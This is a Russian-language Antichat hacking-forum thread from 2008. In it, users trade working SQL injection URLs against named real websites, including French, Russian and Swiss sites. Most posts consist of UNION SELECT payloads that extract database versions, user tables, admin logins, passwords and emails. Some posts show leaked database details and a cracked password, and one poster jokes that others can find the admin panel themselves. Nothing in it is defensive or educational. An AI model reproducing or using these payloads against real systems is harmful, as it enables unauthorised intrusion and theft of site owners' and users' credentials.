ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5841  
Старый 30.06.2008, 19:52
Аватар для SUBJECT617
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию

Цитата:
http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,table_name,5+from+information _schema.tables+where+table_name+like+0x25757365722 5/*
Цитата:
http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_ password,user_email,user_icq),5+from+piter_phpbb_u sers/*
Страшный случай. Смотрим в исходном коде Лучше для этого юзать SQL inj tools ИМХО
 
Ответить с цитированием

  #5842  
Старый 30.06.2008, 23:49
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

SUBJECT617
Цитата:
http://nn-photo.ru/photo.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,user_ password,user_email,user_icq),5+from+nn_phpbb_user s/*
вот это правильная база.)

agamemn0n
Цитата:
http://www.abc-english-grammar.com/forum/questions.asp?lesson=1+or+1=(SELECT+TOP+1+TABLE_NA ME+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME +NOT+IN+('views'))--
продолжай..)
 
Ответить с цитированием

  #5843  
Старый 01.07.2008, 00:12
Аватар для gisTy
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от sabe  
agamemn0n
продолжай..)
может я чего то не понимаю, но ты перейди по той ссылке, что ты дал..
там вообще есть возможность инъекта?

Последний раз редактировалось gisTy; 01.07.2008 в 00:33..
 
Ответить с цитированием

  #5844  
Старый 01.07.2008, 00:14
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

HairStylesDesign.com - PR 5
Цитата:
http://www.hairstylesdesign.com/gallery/fiche.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user())/*
есть таблица users, но поля не угалал..(
 
Ответить с цитированием

  #5845  
Старый 01.07.2008, 01:17
Аватар для agamemn0n
agamemn0n
Новичок
Регистрация: 30.04.2008
Сообщений: 5
Провел на форуме:
67431

Репутация: 1
По умолчанию

http://prepadav.net/view_sellers_work.php?sel=1'+union+select+user_ password+from+ phpbb_users+where+user_id='3
 
Ответить с цитированием

  #5846  
Старый 01.07.2008, 07:09
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Fauvel.fr - pr 4
Цитата:
http://www.fauvel.fr/carrelage/web/catalogue/fiche.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5/*
вывод в index:
Цитата:
<li><a href="3" target="_blank">4.0.18-log:fauvel_db:fauvel@localhost</a></li>

Последний раз редактировалось sabe; 01.07.2008 в 20:06..
 
Ответить с цитированием

  #5847  
Старый 01.07.2008, 10:41
Аватар для #urbaner
#urbaner
Новичок
Регистрация: 30.03.2008
Сообщений: 19
Провел на форуме:
95226

Репутация: 10
Отправить сообщение для #urbaner с помощью ICQ
По умолчанию

Цитата:
http://auto.tbroker.ru/showauto.php?ID=99999999999999+union+select+1,2,3, password,login,6,7,8,USER(),10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+ from+users+limit+3.1/*
Это по круче будет))))Админку сами ищите
 
Ответить с цитированием

  #5848  
Старый 01.07.2008, 18:51
Аватар для tor4)
tor4)
Познающий
Регистрация: 27.05.2008
Сообщений: 51
Провел на форуме:
611529

Репутация: 41
По умолчанию

www.fruity-mail.ru
Цитата:
http://www.fruity-mail.ru/catalog.php?id=13&subid=20%27
version: 5.0.45
user: u12625_frumail@10.10.12.63
database: u12625_frumail

Цитата:
http://www.fruity-mail.ru/catalog.php?id=13&subid=20+union+select+1,concat_w s(0x3a,name,login,password,email),3+from+frumail_a dmins/*
 
Ответить с цитированием

  #5849  
Старый 01.07.2008, 18:54
Аватар для sabe
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

сегодня у нас .FR

Univ-paris13.fr - pr 6
Цитата:
http://www.univ-paris13.fr/formationsUP13/form/fiche.php?id=99999'+union+select+1,concat_ws(0x3a, version()),3/*
Wildside.fr - pr 5
Цитата:
http://www.wildside.fr/video/fiche.php?id=999999+union+select+concat_ws(0x3a,ve rsion(),database(),user()),2,3/*
Gedeonprogrammes.com - pr 5
Цитата:
http://www.gedeonprogrammes.com/en/fiche.php?annee=&id=999999+UNION+SELECT+1,2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,concat_ws(0x3a, version(),database(),user())/*
Amis-musees.fr - pr 4
Цитата:
http://www.amis-musees.fr/sams/fiche.php?id=9999999+UNION+SELECT+version(),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27,28,29,30,31/*
Prettypictures.fr - p4
Цитата:
http://www.prettypictures.fr/fiche.php?id=999999+union+select+1,version(),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*
и еще..)

Lowriderteeshirt.ch pr 5
Цитата:
http://www.lowriderteeshirt.ch/Fiche.php?Rub=TSM&ID=9999999'+union+select+1,conca t_ws(0x3a,username,password),3+from+emp3p_admins/*

Последний раз редактировалось sabe; 01.07.2008 в 20:27..
 
Ответить с цитированием

  #5850  
Старый 01.07.2008, 21:40
Аватар для SUBJECT617
SUBJECT617
Познающий
Регистрация: 06.08.2007
Сообщений: 85
Провел на форуме:
1695462

Репутация: 91
Отправить сообщение для SUBJECT617 с помощью ICQ
По умолчанию

Цитата:
http://www.kultprosvet.ru/text.php?t=-1+union+select+1,concat_ws(0x3a,lgn,pass)+from+clt _users+limit+1,1/*
SHA-1 пасс - FaileR1
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ